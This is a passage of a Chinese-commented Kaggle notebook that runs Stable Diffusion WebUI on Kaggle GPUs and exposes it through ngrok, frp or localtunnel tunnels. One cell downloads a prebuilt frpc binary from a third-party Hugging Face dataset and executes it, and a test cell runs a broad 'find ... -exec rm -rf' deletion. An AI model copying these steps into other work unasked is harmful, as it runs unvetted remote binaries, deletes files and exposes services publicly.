in os.listdir(source_path):\n source_file_path = os.path.join(source_path, filename)\n target_file_path = os.path.join(target_dir, filename)\n if not os.path.exists(target_file_path):\n os.symlink(source_file_path, target_file_path)\n print(f'Created symlink for {filename} in {target_dir}')\n else:\n filename = os.path.basename(source_path)\n target_file_path = os.path.join(target_dir, filename)\n if not os.path.exists(target_file_path):\n os.symlink(source_path, target_file_path)\n print(f'Created symlink for {filename} in {target_dir}')\n print('链接成功')\n \n# 链接模型文件\ndef link_models():\n cn_model.append('/kaggle/models/cn-model')\n vae_model.append('/kaggle/models/VAE')\n sd_model.append('/kaggle/models/Stable-diffusion')\n lora_model.append('/kaggle/models/Lora')\n hypernetworks_model.append('/kaggle/models/hypernetworks')\n ESRGAN.append('/kaggle/models/ESRGAN')\n lyco_model.append('/kaggle/models/lyco')\n animatediff_model.append('/kaggle/models/animatediffmodel')\n animatediff_lora.append('/kaggle/models/animatedifflora')\n create_symlinks(vae_model,f'{install_path}/stable-diffusion-webui/models/VAE')\n create_symlinks(sd_model,f'{install_path}/stable-diffusion-webui/models/Stable-diffusion')\n create_symlinks(lora_model,f'{install_path}/stable-diffusion-webui/models/Lora')\n create_symlinks(cn_model,f'{install_path}/stable-diffusion-webui/extensions/sd-webui-controlnet/models')\n create_symlinks(embeddings_model,f'{install_path}/stable-diffusion-webui/embeddings')\n create_symlinks(hypernetworks_model,f'{install_path}/stable-diffusion-webui/models/hypernetworks')\n create_symlinks(ESRGAN,f'{install_path}/stable-diffusion-webui/models/ESRGAN')\n create_symlinks(tags,f'{install_path}/stable-diffusion-webui/extensions/a1111-sd-webui-tagcomplete/tags')\n create_symlinks(scripts,f'{install_path}/stable-diffusion-webui/scripts')\n create_symlinks(lyco_model,f'{install_path}/stable-diffusion-webui/models/lyco')\n create_symlinks(animatediff_model,f'{install_path}/stable-diffusion-webui/extensions/sd-webui-animatediff/model')\n create_symlinks(animatediff_lora,f'{install_path}/stable-diffusion-webui/models/Lora')\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"# 功能函数:内网穿透\n#ngrok\ndef ngrok_start(ngrokTokenFile: str, port: int, address_name: str, should_run: bool):\n if not should_run:\n print('Skipping ngrok start')\n return\n if Path(ngrokTokenFile).exists():\n with open(ngrokTokenFile, encoding=\"utf-8\") as nkfile:\n ngrokToken = nkfile.readline()\n print('use nrgok')\n from pyngrok import conf, ngrok\n conf.get_default().auth_token = ngrokToken\n conf.get_default().monitor_thread = False\n ssh_tunnels = ngrok.get_tunnels(conf.get_default())\n if len(ssh_tunnels) == 0:\n ssh_tunnel = ngrok.connect(port, bind_tls=True)\n print(f'{address_name}:' + ssh_tunnel.public_url)\n else:\n print(f'{address_name}:' + ssh_tunnels[0].public_url)\n else:\n print('skip start ngrok')\n\n#Frp内网穿透 \nimport subprocess\n\ndef install_Frpc(port, frpconfigfile, use_frpc):\n if use_frpc:\n subprocess.run(['chmod', '+x', '/kaggle/working/frpc/frpc'], check=True)\n print(f'正在启动frp ,端口{port}')\n subprocess.Popen(['/kaggle/working/frpc/frpc', '-c', frpconfigfile])\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">自动压缩保存图片</span>","metadata":{"editable":false}},{"cell_type":"code","source":"import os\nimport time\nimport zipfile\nimport random\ndirectory = f'{install_path}/stable-diffusion-webui/outputs'\noutput_directory = '/kaggle/working/历史生成/'\noutput_path = '/kaggle/working/archive.zip' \nclass ImageCompressor:\n def __init__(self, directory, output_path, save_time):\n self.directory = directory\n self.output_path = output_path\n self.save_time = save_time\n def _compress_single_image(self, zipf, filepath):\n zipf.write(filepath, os.path.relpath(filepath, self.directory))\n def compress_directory(self):\n while True:\n with zipfile.ZipFile(self.output_path, 'w', zipfile.ZIP_DEFLATED) as zipf:\n for root, _, files in os.walk(self.directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n self._compress_single_image(zipf, filepath)\n print(f\"每隔{self.save_time}秒保存一次图片到archive.zip\")\n time.sleep(self.save_time)\n def run(self):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', 7860))\n if result == 0:\n break\n sock.close()\n self.compress_directory()\ndef compress_images(directory, output_directory):\n !mkdir /kaggle/working/历史生成/\n initial_files = set()\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n initial_files.add(filepath)\n counter = 1 \n while True:\n time.sleep(0.1)\n current_files = set()\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n current_files.add(filepath)\n new_files = current_files - initial_files\n if new_files:\n temperatures = get_gpu_temperature()\n for i, temp in enumerate(temperatures):\n print(f\"当前GPU Nvidia Tesla T4 {i+1} 温度: {temp}°C(温度越高,生成速度会稍微下降0.2%)\")\n #output_filename = str(counter).zfill(8) + '.zip' \n #output_path = os.path.join(output_directory, output_filename)\n #zipf = zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED)\n #for file in new_files:\n # zipf.write(file, os.path.relpath(file, directory))\n #zipf.close() # 递增计数器\n #initial_files = current_files\n #counter += 1\ndef extract_all_zips(directory):\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith('.zip'):\n filepath = os.path.join(root, file)\n with zipfile.ZipFile(filepath, 'r') as zip_ref:\n zip_ref.extractall(root)\n os.remove(filepath)","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">SD-webui启动函数</span>","metadata":{"editable":false}},{"cell_type":"code","source":"def iframe_thread_1(port):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', port))\n if result == 0:\n break\n sock.close()\n p = subprocess.Popen([\"lt\", \"--port\", \"{}\".format(port)], stdout=subprocess.PIPE)\n for line in p.stdout:\n print(line.decode(), end='')\n result = subprocess.run(['curl', 'ipv4.icanhazip.com'], capture_output=True, text=True)\n print('部署WebUI成功!你的公网IP地址是', result.stdout.strip())\n print('如果该链接卡顿,可换Ngrok内网穿透')\n print('记得给作者打赏哦')\n \ndef start_webui_1():\n if use2:\n install_Frpc('7861',frpconfigfile1,use_frpc1)\n #ngrok_start(ngrokTokenFile1,7861,'第二个webui',ngrok_use1)\n !sleep 90\n #threading.Thread(target=iframe_thread_1, daemon=True, args=(7861,)).start()\n %cd $install_path/stable-diffusion-webui\n args1.append(f'--ckpt=models/Stable-diffusion/{usedCkpt1}')\n if os.path.exists(Venvpath):\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args1)} --port 7861 --device-id=1\n else:\n !sleep 12\n print(\"\\033[92m 您选择不使用第二张显卡运行,函数start_webui_1跳过 \\033[0m\")\n pass\n\ndef start_webui_0():\n print('\\033[92m 正在以第一张显卡启动SD-webui \\033[0m')\n if environment == 2:\n !/kaggle/opt/conda/envs/venv/bin/python3 -m pip install xformers==0.0.23\n if use_frpc:\n !aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/datasets/ACCA225/Frp/resolve/main/frpc -d /kaggle/working/frpc -o frpc\n #threading.Thread(target=iframe_thread, daemon=True, args=(7860,)).start()\n %cd $install_path\n install_Frpc('7860',frpconfigfile,use_frpc)\n #ngrok_start(ngrokTokenFile,7860,'第一个webui',ngrok_use)\n %cd $install_path/stable-diffusion-webui\n !mkdir models/lyco\n args.append(f'--ckpt=models/Stable-diffusion/{usedCkpt}')\n if os.path.exists(Venvpath):\n if os.path.exists(\"/kaggle/opt/conda/envs/venv/bin/python3\"):\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args)}\n else:\n print(\"由于你自身迷惑操作导致发生未知错误,正在重试\")\n fix_attempt()\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py\n else:\n !/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args)} \n\ndef iframe_thread(port):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', port))\n if result == 0:\n break\n sock.close()\n p = subprocess.Popen([\"lt\", \"--port\", \"{}\".format(port)], stdout=subprocess.PIPE)\n for line in p.stdout:\n print(line.decode(), end='')\n result = subprocess.run(['curl', 'ipv4.icanhazip.com'], capture_output=True, text=True)\n print('部署WebUI成功!你的公网IP地址是', result.stdout.strip())\n print('请从对应7860或者7861端口的内网穿透链接进入SD')\n \ndef nv():\n !/kaggle/opt/conda/envs/venv/bin/python3 -m \"pip\" install nvidia-ml-py3 > /dev/null 2>&1\ndef start_webui():\n if use2:\n print('正在以双卡模式启动WebUI')\n else:\n print('正在以单卡模式启动WebUI,如需使用双卡跑图,请将use2设置为True')\n \n with ProcessPoolExecutor() as executor:\n futures = []\n for func in [nv, start_webui_0, start_webui_1]:\n futures.append(executor.submit(func))\n time.sleep(1)\n for future in futures:\n future.result()\n \ndef prepare():\n if localtunnel: \n !apt-get update & npm install -g localtunnel\n else:\n os.system('apt-get update')\n os.system('apt -y install -qq aria2 > /dev/null 2>&1')","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"import multiprocessing\n# 将会同步的文件\nyun_files = [\n'ui-config.json',\n'config.json',\n'styles.csv'\n]\ndef warn():\n print(\"正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!\")\n print(\"正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!\")\n print(\"\\033[92m正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!重要的事情说三遍\\033[0m\")\ndef main():\n startTicks = time.time()\n #ngrokdetect()\n def func1():\n warn()\n def func2():\n prepare()\n process1 = multiprocessing.Process(target=func1)\n process2 = multiprocessing.Process(target=func2)\n process1.start()\n process2.start()\n with ProcessPoolExecutor() as executor:\n futures = []\n for func in [install_webui, venv_install]:\n futures.append(executor.submit(func))\n time.sleep(0.5)\n try:\n for future in futures:\n future.result()\n except Exception as e:\n print(\"运行出错了。\")\n except CancelledError:\n print(\"运行被用户中止\")\n #libtcmalloc()\n downloadsize()\n ticks = time.time()\n print(\"加载耗时:\", (ticks - startTicks), \"s\")\n if '--share' in args:\n print('您正在使用Gradio内网穿透,这可能会导致会话被强制终止')\n try:\n start_webui()\n except Exception as e:\n print(f\"由于你自身的迷惑操作导致发生未知错误,错误信息:{e}\")","metadata":{"ExecutionIndicator":{"show":false},"tags":[],"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"-------------","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">打包图片上传到HuggingFace (可选)</span>","metadata":{"editable":false}},{"cell_type":"code","source":"#功能函数,清理打包上传\nfrom pathlib import Path\nfrom huggingface_hub import HfApi, login\n\ndef zip_venv():\n !pip install conda-pack\n !rm -rf /kaggle/working/venv.tar.gz\n !conda pack -n venv -o /kaggle/working/venv.tar.gz --compress-level 0\n\ndef hugface_upload(huggingface_token_file, yun_files, repo_id):\n if Path(huggingface_token_file).exists():\n with open(huggingface_token_file, encoding=\"utf-8\") as nkfile:\n hugToken = nkfile.readline()\n if hugToken != '':\n # 使用您的 Hugging Face 访问令牌登录\n login(token=hugToken)\n # 实例化 HfApi 类\n api = HfApi()\n print(\"HfApi 类已实例化\")\n %cd $install_path/stable-diffusion-webui\n # 使用 upload_file() 函数上传文件\n print(\"开始上传文件...\")\n for yun_file in yun_files:\n if Path(yun_file).exists():\n response = api.upload_file(\n path_or_fileobj=yun_file,\n path_in_repo=yun_file,\n repo_id=repo_id,\n repo_type=\"dataset\"\n )\n print(\"文件上传完成\")\n print(f\"响应: {response}\")\n else:\n print(f'Error: File {yun_file} does not exist')\n else:\n print(f'Error: File {huggingface_token_file} does not exist')\n\ndef clean_folder(folder_path):\n if not os.path.exists(folder_path):\n return\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n\ndef zip_clear_updata():\n if zip_output:\n output_folder = '/kaggle/working/'\n if os.path.exists(output_folder):\n shutil.make_archive('/kaggle/working/图片', 'zip', output_folder)\n print('图片已压缩到output')\n else:\n print(f'文件夹 {output_folder} 不存在,跳过压缩操作')\n if clear_output:\n %cd /kaggle/outputs/\n clean_folder('img2img-images')\n clean_folder('txt2img-images')\n clean_folder('img2img-grids')\n clean_folder('txt2img-grids')\n clean_folder('extras-images')\n print('清理完毕')\n if huggingface_use == True:\n hugface_upload(huggingface_token_file,yun_files,huggiingface_repo_id)\n if use_zip_venv == True:\n zip_venv()\n \ntry:\n code()\nexcept Exception as e:\n print('运行失败,请检查Internet是否开启')\nwith open('/kaggle/temp/Token.txt', 'r') as file:\n file_contents = file.read()","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:red; font-weight:;\">执行区域,输出结果在此处看,从内网穿透链接进入Stable Diffusion绘画界面</span>","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:red; font-weight:;\">如果报错了,请反馈给群主</span>","metadata":{"editable":false}},{"cell_type":"code","source":"import concurrent.futures\n'''\n执行函数\n'''\nif __name__ == \"__main__\":\n compressor = ImageCompressor(directory=directory, output_path=output_path, save_time=200) #save_time为图片自动保存间隔,默认60秒压缩保存一次图片\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)\n future1 = executor.submit(main)\n future2 = executor.submit(compressor.run)\n concurrent.futures.wait([future1, future2])\n executor.shutdown()","metadata":{"_kg_hide-input":true,"_kg_hide-output":false,"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"#测试用\n!cp -r /kaggle/opt/conda/envs/venv /kaggle/working\n\n!/kaggle/opt/conda/envs/venv/bin/python3 -m \"pip\" install insightface\n\n%cd /kaggle/working/opt/conda/envs\n\n!find . ! -name 'venv_2024.2.18.tar.bak' -exec rm -rf {} +\n\n%cd /kaggle/working\n\n!tar -cvf /kaggle/working/venv_2024.2.18.tar.bak ./venv","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"'''\n -h, --help 显示此帮助消息并退出\n --update-all-extensions\n launch.py 参数:在启动程序时下载所有扩展的更新\n --skip-python-version-check\n launch.py 参数:不检查Python版本\n --skip-torch-cuda-test\n launch.py 参数:不检查CUDA是否能正常工作\n --reinstall-xformers launch.py 参数:安装适当版本的xformers,即使您已经安装了某个版本\n --reinstall-torch launch.py 参数:安装适当版本的torch,即使您已经安装了某个版本\n --update-check launch.py 参数:在启动时检查更新\n --test-server launch.py 参数:配置用于测试的服务器\n --skip-prepare-environment\n launch.py 参数:跳过所有环境准备步骤\n --skip-install launch.py 参数:跳过软件包的安装\n --data-dir DATA_DIR 存储所有用户数据的基本路径\n --config CONFIG 构建模型的配置文件路径\n --ckpt CKPT 稳定扩散模型的检查点路径;如果指定了此参数,该检查点将添加到检查点列表并加载\n --ckpt-dir CKPT_DIR 包含稳定扩散检查点的目录路径\n --vae-dir VAE_DIR 包含VAE文件的目录路径\n --gfpgan-dir GFPGAN_DIR\n GFPGAN目录\n --gfpgan-model GFPGAN_MODEL\n GFPGAN模型文件名\n --no-half 不将模型切换为16位浮点数\n --no-half-vae 不将VAE模型切换为16位浮点数\n --no-progressbar-hiding\n 不在gradio UI中隐藏进度条(因为它会减慢浏览器中的硬件加速)\n --max-batch-count MAX_BATCH_COUNT\n UI的最大批次计数值\n --embeddings-dir EMBEDDINGS_DIR\n 文本反演的嵌入目录(默认为embeddings)\n --textual-inversion-templates-dir TEXTUAL_INVERSION_TEMPLATES_DIR\n 包含文本反演模板的目录路径\n --hypernetwork-dir HYPERNETWORK_DIR\n 超网络目录\n --localizations-dir LOCALIZATIONS_DIR\n 本地化目录\n --allow-code 允许从Web界面执行自定义脚本\n --medvram 启用稳定扩散模型的优化,以牺牲一些速度以实现低VRM使用率\n --lowvram 启用稳定扩散模型的优化,以牺牲大量速度以实现非常低的VRM使用率\n --lowram 将稳定扩散检查点权重加载到VRAM而不是RAM中\n --always-batch-cond-uncond\n 禁用条件/非条件批处理,该批处理可通过--medvram或--lowvram来节省内存\n --unload-gfpgan 无任何操作。\n --precision {full,autocast}\n 在此精度下进行评估\n --upcast-sampling 上升采样。对于--no-half没有影响。通常与--no-half相比,产生类似的结果,性能更好,同时使用更少的内存。\n --share 对gradio使用share=True,并使UI可以通过其网站访问\n --ngrok NGROK ngrok的认证令牌,替代gradio --share\n --ngrok-region NGROK_REGION\n 无任何操作。\n --ngrok-options NGROK_OPTIONS\n 以JSON格式传递给ngrok的选项,例如:\n '{\"authtoken_from_env\":true,\n \"basic_auth\":\"user:password\",\n \"oauth_provider\":\"google\",\n \"oauth_allow_emails\":\"[email protected]\"}'\n --enable-insecure-extension-access\n 禁用其他选项,启用扩展选项\n --codeformer-models-path CODEFORMER_MODELS_PATH\n 包含codeformer模型文件的目录路径。\n --gfpgan-models-path GFPGAN_MODELS_PATH\n 包含GFPGAN模型文件的目录路径。\n --esrgan-models-path ESRGAN_MODELS_PATH\n 包含ESRGAN模型文件的目录路径。\n --bsrgan-models-path BSRGAN_MODELS_PATH\n 包含BSRGAN模型文件的目录路径。\n --realesrgan-models-path REALESRGAN_MODELS_PATH\n 包含RealESRGAN模型文件的目录路径。\n --clip-models-path CLIP_MODELS_PATH\n 包含CLIP模型文件的目录路径。\n --xformers 启用xformers的交叉注意力层\n --force-enable-xformers\n 启用xformers的交叉注意力层,无论检查代码是否认为您可以运行它;如果此操作无法正常工作,请不要提交错误报告\n --xformers-flash-attention\n 启用具有Flash Attention的xformers,以提高可重现性(仅适用于SD2.x或变体)\n --deepdanbooru 无任何操作。\n --opt-split-attention\n 首选Doggettx的交叉注意力层优化,用于自动选择优化方式\n --opt-sub-quad-attention\n 首选内存高效的次二次交叉���意力层优化,用于自动选择优化方式\n --sub-quad-q-chunk-size SUB_QUAD_Q_CHUNK_SIZE\n 用于次二次交叉注意力层优化的查询块大小\n --sub-quad-kv-chunk-size SUB_QUAD_KV_CHUNK_SIZE\n 用于次二次交叉注意力层优化的kv块大小\n --sub-quad-chunk-threshold SUB_QUAD_CHUNK_THRESHOLD\n 用于次二次交叉注意力层优化的VRAM阈值的百分比,以使用块处理\n --opt-split-attention-invokeai\n 首选InvokeAI的交叉注意力层优化,用于自动选择优化方式\n --opt-split-attention-v1\n 首选旧版本的分割注意力优化,用于自动选择优化方式\n --opt-sdp-attention 首选缩放点积交叉注意力层优化,用于自动选择优化方式;需要PyTorch 2.*\n --opt-sdp-no-mem-attention\n 首选没有内存高效注意力的缩放点积交叉注意力层优化,用于自动选择优化方式,使图像生成具有确定性;需要PyTorch 2.*\n --disable-opt-split-attention\n 首选不进行交叉注意力层优化,用于自动选择优化方式\n --disable-nan-check 不检查生成的图像/潜空间是否包含NaN;在没有检查点的情况下运行时很有用\n --use-cpu USE_CPU [USE_CPU ...]\n 使用CPU作为指定模块的torch设备\n --listen 使用0.0.0.0作为服务器名称启动gradio,以响应网络请求\n --port PORT 使用给定的服务器端口启动gradio,对于<1024的端口,您需要root/admin权限,默认为7860(如果可用)\n --show-negative-prompt\n 无任何操作。\n --ui-config-file UI_CONFIG_FILE\n 用于ui配置的文件名\n --hide-ui-dir-config 隐藏Web界面中的目录配置\n --freeze-settings 禁用编辑设置\n --ui-settings-file UI_SETTINGS_FILE\n 用于ui设置的文件名\n --gradio-debug 使用--debug选项启动gradio\n --gradio-auth GRADIO_AUTH\n 设置gradio的身份验证,格式为“username:password”;或者使用逗号分隔多个,例如“u1:p1,u2:p2,u3:p3”\n --gradio-auth-path GRADIO_AUTH_PATH\n 设置gradio的身份验证文件路径,例如“/path/to/auth/file”,与--gradio-auth具有相同的身份验证格式\n --gradio-img2img-tool GRADIO_IMG2IMG_TOOL\n 无任何操作。\n --gradio-inpaint-tool GRADIO_INPAINT_TOOL\n 无任何操作。\n --gradio-allowed-path GRADIO_ALLOWED_PATH\n 将路径添加到gradio的allowed_paths,使其可以从中提供文件\n --opt-channelslast 将稳定扩散的内存类型更改为channels last\n --styles-file STYLES_FILE\n 用于样式的文件名\n --autolaunch 启动后在系统的默认浏览器中打开Web界面的URL\n --theme THEME 使用浅色或深色主题启动UI\n --use-textbox-seed 在UI中使用文本框作为种子(没有上/下箭头,但可以输入长种子)\n --disable-console-progressbars\n 不将进度条输出到控制台\n --enable-console-prompts\n 使用txt2img和img2img生成时,在控制台打印提示\n --vae-path VAE_PATH 用作VAE的检查点;设置此参数会禁用与VAE相关的所有设置\n --disable-safe-unpickle\n 禁用检查PyTorch模型是否包含恶意代码\n --api 使用api=True同时启动API和Web界面(仅使用--nowebui启动API)\n --api-auth API_AUTH 设置API的身份验证,格式为“username:password”;或者使用逗号分隔多个,例如“u1:p1,u2:p2,u3:p3”\n --api-log 使用api-log=True启用所有API请求的日志记录\n --nowebui 使用api=True启动API而不是Web界面\n --ui-debug-mode 不加载模型,快速启动UI\n --device-id DEVICE_ID\n 选择要使用的默认CUDA设备(在之前需要导出CUDA_VISIBLE_DEVICES=0,1等)\n --administrator 管理员权限\n --cors-allow-origins CORS_ALLOW_ORIGINS\n 以逗号分隔的列表形式的允许CORS源(无空格)\n --cors-allow-origins-regex CORS_ALLOW_ORIGINS_REGEX\n 单个正则表达式形式的允许CORS源\n --tls-keyfile TLS_KEYFILE\n 部分启用TLS,需要--tls-certfile才能完全工作\n --tls-certfile TLS_CERTFILE\n 部分启用TLS,需要--tls-keyfile才能完全工作\n --disable-tls-verify 通过此参数启用使用自签名证书。\n --server-name SERVER_NAME\n 设置服务器的主机名\n --gradio-queue 无任何操作。\n --no-gradio-queue 禁用gradio队列;导致网页使用HTTP请求而不是Websockets;在早期版本中是默认设置\n --skip-version-check 不检查torch和xformers的版本\n --no-hashing 禁用检查点的sha256哈希,以提高加载性能\n --no-download-sd-model\n 即使在--ckpt-dir中找不到模型,也不下载SD1.5模型\n --subpath SUBPATH 自定义gradio的子路径,与反向代理一起使用\n --add-stop-route 添加/_stop路由以停止服务器\n '''","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null}]}